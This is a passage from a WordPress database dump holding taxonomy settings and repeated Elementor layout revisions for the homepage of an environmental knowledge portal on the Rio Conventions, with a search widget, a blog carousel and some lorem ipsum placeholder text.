ypes_wp_block','0'),(3262,413,'built_in_post_types_wpforms','0'),(3263,413,'built_in_post_types_wpforms_log','0'),(3264,413,'built_in_post_types_attachment','0'),(3265,413,'show_in_menu','1'),(3266,413,'menu_location','default'),(3267,413,'menu_position','0'),(3268,413,'show_in_nav_menus','1'),(3269,413,'show_tagcloud','1'),(3270,413,'show_tagcloud_in_edit','1'),(3271,413,'show_in_quick_edit','1'),(3272,413,'show_admin_column','0'),(3273,413,'pfat_enable','0'),(3274,413,'pfat_run_outside_loop','0'),(3275,413,'pfat_append_archive','append'),(3276,413,'rest_enable','0'),(3277,413,'read_all','0'),(3278,413,'write_all','0'),(3279,414,'_wp_page_template','default'),(3280,414,'_elementor_edit_mode','builder'),(3281,414,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3282,414,'_elementor_version','2.7.5'),(3283,414,'_elementor_template_type','wp-page'),(3287,415,'_wp_page_template','default'),(3288,415,'_elementor_edit_mode','builder'),(3289,415,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3290,415,'_elementor_version','2.7.5'),(3291,415,'_elementor_template_type','wp-page'),(3295,416,'_wp_page_template','default'),(3296,416,'_elementor_edit_mode','builder'),(3297,416,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3298,416,'_elementor_version','2.7.5'),(3299,416,'_elementor_template_type','wp-page'),(3303,417,'_wp_page_template','default'),(3304,417,'_elementor_edit_mode','builder'),(3305,417,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn 